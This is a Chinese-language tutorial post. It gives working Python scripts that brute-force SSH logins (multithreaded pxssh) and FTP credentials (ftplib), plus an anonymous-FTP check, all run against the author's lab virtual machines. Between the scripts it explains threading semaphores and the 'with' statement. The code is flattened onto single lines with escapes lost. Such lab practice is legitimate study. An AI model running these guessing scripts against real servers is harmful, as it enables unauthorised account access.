Python中FTP服務與SSH登錄暴力破解的實現
本文繼續學習下 Python 編程在網絡攻防領域的應用,主要是通過 Python 腳本進行 SSH 登錄爆破和 FTP 服務登錄爆破。
SSH爆破演示環境借助 Kali 虛擬機進行自身的 SSH 服務的登錄爆破,注意提前修改/etc/ssh/sshd_config配置文件并執行命令service ssh start運行 SSH 服務。
腳本演示先來看看代碼:
from pexpect import pxsshimport argparseimport threadingimport sysmaxConnetions = 5connect_lock = threading.BoundedSemaphore(value=maxConnetions)def connect(host, user, password): try:s = pxssh.pxssh()# 登錄ssh測試s.login(host, user, password)print('[+] Password Found: {}'.format(password))sys.exit(0) except pxssh.ExceptionPxssh as e:passdef main(): # 定義腳本的運行參數、獲取用戶輸入的對應參數值 parser = argparse.ArgumentParser() parser.add_argument(’-H’, dest=’Host’, help='like: 192.168.3.1') parser.add_argument(’-F’, dest=’passwdFile’, help='like: /root/pass.txt') parser.add_argument(’-u’, dest=’user’) args = parser.parse_args() host = args.Host passwdFile = args.passwdFile user = args.user # 讀取字典文件、使用多線程進行口令爆破 with open(passwdFile, ’r’) as f:for line in f.readlines(): with connect_lock:password = line.strip(’n’)print('[-] Testing: {}'.format(password))# 起線程每個密碼嘗試登錄一次t = threading.Thread(target=connect, args=(host, user, password))t.start()main()
在 Kali 終端運行,運行腳本可使用 -h 參數獲得提示,效果如下:
最終暴力破解獲得密碼 root:
上述腳本開啟 5 個線程連接,開啟線程速度會更快是因為這里要遠程連接,等待網絡有阻塞,故開啟多線程可以加快速度(實際上多線程是一個 CPU 在交替運行)。
信號量類注意到代碼中使用threading.BoundedSemaphore(value=maxConnetions)來控制最大線程數量,下面來學習下相關語法知識。
Python 的 threading 線程模塊中的 Semaphore 類和 BoundedSemaphore 類來實現并發限制。
Semaphore 類和 BoundedSemaphore 類都是信號量類,每次有線程獲得信號量(即 acquire() )的時候計數器 -1,釋放信號量(release())時候計數器+1,計數器為 0 的時候其它線程就被阻塞無法獲得信號量; 當計數器為設定好的上限的時候 BoundedSemaphore 就無法進行 release() 操作了,而 Semaphore 沒有這個限制檢查。下面直接通過這兩個類的簡單示例來學習理解下這兩個類在線程控制中的意義。
1、首先看看 Semaphore 類:
# coding: utf-8import threadingimport timedef fun(semaphore, num): # 獲得信號量,信號量減一 semaphore.acquire() print('Thread %d is running.' % num) time.sleep(3) # 釋放信號量,信號量加一 semaphore.release()if __name__==’__main__’: # 初始化信號量,數量為2 semaphore = threading.Semaphore(2) # 運行4個線程 for num in range(4):t = threading.Thread(target=fun, args=(semaphore, num))t.start()
代碼運行效果:
可以注意到線程 0 和 1 是一起打印出消息的,而線程 2 和 3 是在 3 秒后打印的,可以得出每次只有 2 個線程獲得信號量,進行打印。
2、接下來看看 BoundedSemaphore 類:
# encoding: UTF-8import threadingimport timedef showfun(n): print('%s start -- %d'%(time.ctime(),n)) print('working') time.sleep(2) print('%s end -- %d' % (time.ctime(), n)) semlock.release()if __name__ == ’__main__’: maxconnections = 5 semlock = threading.BoundedSemaphore(maxconnections) list=[] for i in range(8):semlock.acquire()t=threading.Thread(target=showfun, args=(i,))list.append(t)t.start()
看看代碼運行效果:
Sun Aug 8 18:59:37 2021 start -- 0workingSun Aug 8 18:59:37 2021 start -- 1workingSun Aug 8 18:59:37 2021 start -- 2workingSun Aug 8 18:59:37 2021 start -- 3workingSun Aug 8 18:59:37 2021 start -- 4workingSun Aug 8 18:59:39 2021 end -- 0Sun Aug 8 18:59:39 2021 end -- 1Sun Aug 8 18:59:39 2021 end -- 2Sun Aug 8 18:59:39 2021 end -- 3Sun Aug 8 18:59:39 2021 end -- 4Sun Aug 8 18:59:39 2021 start -- 5workingSun Aug 8 18:59:39 2021 start -- 6workingSun Aug 8 18:59:39 2021 start -- 7workingSun Aug 8 18:59:41 2021 end -- 5Sun Aug 8 18:59:41 2021 end -- 6Sun Aug 8 18:59:41 2021 end -- 7
線程數限制到 5 個,因此等待 0-4 完畢之后 5-7 才能請求到資源進行執行。
with 用法上面代碼中注意到還使用了with connect_lock:語句進行信號量的管理,故來學習下 with 關鍵詞的使用。在 Python 中,with 語句適用于對資源進行訪問的場合,確保不管使用過程中是否發生異常都會執行必要的“清理”操作,釋放資源,比如文件使用后自動關閉/線程中鎖的自動獲取和釋放等。
1、問題引出
如下代碼:
file = open('1.txt')data = file.read()file.close()
上面代碼存在2個問題:
文件讀取發生異常,但沒有進行任何處理; 可能忘記關閉文件句柄;2、代碼改進
try: f = open(’xxx’)except: print(’fail to open’) exit(-1)try: do somethingexcept: do somethingfinally: f.close()
雖然這段代碼運行良好,但比較冗長。而使用 with 的話,能夠減少冗長,還能自動處理上下文環境產生的異常,如下面代碼:
with open('1.txt') as file: data = file.read()
3、with 工作原理
緊跟 with 后面的語句被求值后,返回對象的 “–enter–()” 方法被調用,這個方法的返回值將被賦值給 as 后面的變量; 當with后面的代碼塊全部被執行完之后,將調用前面返回對象的 “–exit–()” 方法。with 工作原理代碼示例:
class Sample: def __enter__(self):print 'in __enter__'return 'Foo' def __exit__(self, exc_type, exc_val, exc_tb):print 'in __exit__'def get_sample(): return Sample()with get_sample() as sample: print 'Sample: ', sample
代碼的運行結果如下:
in __enter__Sample: Fooin __exit__
4、with 作用小結
with 看起來如此簡單,但是其背后還有一些工作要做,因為你不能對 python 的任意對象使用 with,它僅能工作于支持上下文管理協議的對象。只有內建了“上下文管理”的對象可以和 with 一起工作,目前支持該協議的對象有:
filedecimal.Contextthread.LockTypethreading.Lockthreading.RLockthreading.Conditionthreading.Semaphorethreading.BoundedSemaphore
因為上下文管理器主要作用于共享資源,__enter__()和__exit__()方法干的基本是需要分配和釋放資源的低層次工作,比如數據庫連接、鎖分配、信號量加/減、狀態管理、文件打開和關閉、異常處理等。
FTP爆破FTP(File Transfer Protocol)即文件傳輸協議,是一種基于 TCP 的協議,采用客戶/服務器模式。通過 FTP 協議,用戶可以在FTP服務器中進行文件的上傳或下載等操作。雖然現在通過 HTTP 協議下載的站點有很多,但是由于FTP協議可以很好地控制用戶數量和寬帶的分配,快速方便地上傳、下載文件,因此FTP已成為網絡中文件上傳和下載的首選服務器。
服務搭建下面演示在 Win10 虛擬機搭建 FTP 服務。
1、打開的【Windows功能】,將 Internet 信息服務的 4 個子功能打勾“√”,然后點擊【確定】按鈕安裝這些功能,圖示如下:
2、在系統安裝配置完成后,打開 IIS 管理器,點擊【添加FTP站點】,圖示如下:
3、
輸入 FTP 站點名稱,以及允許用戶訪問的目錄路徑,圖示如下:
4、在【綁定】IP 中輸入你本機的 IP 地址,選擇“無SSL”,圖示如下:
5、身份驗證選擇“基本”,指定 Win10 的用戶 True 可登錄,完成配置:
6、物理機瀏覽器輸入 ftp://win10虛擬機ip,即可訪問創建的 ftp 服務,需要輸入賬戶密碼:
7、驗證完賬戶密碼,即可看到 FTP 服務的目錄:
點擊查看具體文件內容:
以上便在局域網內部的 Win10 虛擬機搭建了 FTP 服務,并指定了登錄用戶為 True。
補充一個概念:匿名FTP服務
匿名 FTP 是這樣一種機制:用戶可通過它連接到遠程主機上,并從其下載文件,而無需成為其注冊用戶。系統管理員建立了一個特殊的用戶 ID,名為anonymous, Internet 上的任何人在任何地方都可使用該用戶 ID。
通過 FTP 程序連接匿名 FTP 主機的方式同連接普通 FTP 主機的方式差不多,只是在要求提供用戶標識 ID 時必須輸入anonymous,該用戶 ID 的口令可以是任意的字符串。習慣上,用自己的 E-mail 地址作為口令,使系統維護程序能夠記錄下來誰在存取這些文件。
匿名掃描下面先來演示下借助腳本測試 FTP 服務器是否啟用匿名登錄:
# coding=utf-8import ftplibdef ftpLogin(hostname): try:ftp = ftplib.FTP(hostname)ftp.login(’anonymous’, ’[email protected]’)print(’[*] ’ + str(hostname) + ’ FTP Anonymous Logon Succeeded.’)ftp.quit()exit(0) except Exception as e:print(’[-] FTP Anonymous Logon Failed.’,e)if __name__ == '__main__': ftpLogin('192.168.66.101')
代碼運行結果,可見當前 FTP 服務器并不支持匿名登錄:
可更改 Win10 虛擬機的 FTP 服務配置,啟用匿名登錄:
下面來對 FTP 服務的 True 賬戶的密碼進行暴力破解:
# coding=utf-8import ftplibdef BruteLogin(hostname, passwdFile): pF = open(passwdFile, ’r’) for line in pF.readlines():username = line.split(’:’)[0]password = line.split(’:’)[1].strip(’r’).strip(’n’)print(’[+] Trying: ’ + username + ’/’ + password)try: ftp = ftplib.FTP(hostname) ftp.login(username, password) print(’[*] ’ + str(hostname) + ’ FTP Logon Succeeded: ’ + username + ’/’ + password) ftp.quit() exit(0)except Exception as e: pass print(’[-] Could not brubrute force FTP credentials.’) exit(0)if __name__=='__main__': BruteLogin('192.168.66.101', 'pwd.txt')
代碼運行效果如下:
其中密碼字典如下:
本文學習了如何通過 Python 腳本進行 FTP、SSH 服務的登錄爆破,雖然 Kali 自帶了類似的工具,但是主要目的還是鍛煉 Python 編程能力和學習 Python 編程應用。后續還會繼續學習 Python 更多的網絡攻防應用場景!
到此這篇關于Python中FTP服務與SSH登錄暴力破解的實現的文章就介紹到這了,更多相關Python 暴力破解 內容請搜索好吧啦網以前的文章或繼續瀏覽下面的相關文章希望大家以后多多支持好吧啦網!
相關文章: